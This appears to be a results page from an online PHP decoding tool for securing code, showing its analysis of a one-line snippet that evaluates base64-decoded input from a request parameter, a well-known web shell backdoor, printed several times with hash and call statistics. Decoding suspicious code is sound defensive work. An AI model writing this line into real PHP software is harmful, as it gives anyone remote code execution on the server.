Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode($_REQUEST['comment'])); ?> ..

Decoded Output download

<?php 
eval(base64_decode($_REQUEST['comment'])); 
?> 

Did this file decode correctly?

Original Code

<?php
eval(base64_decode($_REQUEST['comment']));
?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 96a47a286274514d04cbf031194c5b14
Eval Count 0
Decode Time 108 ms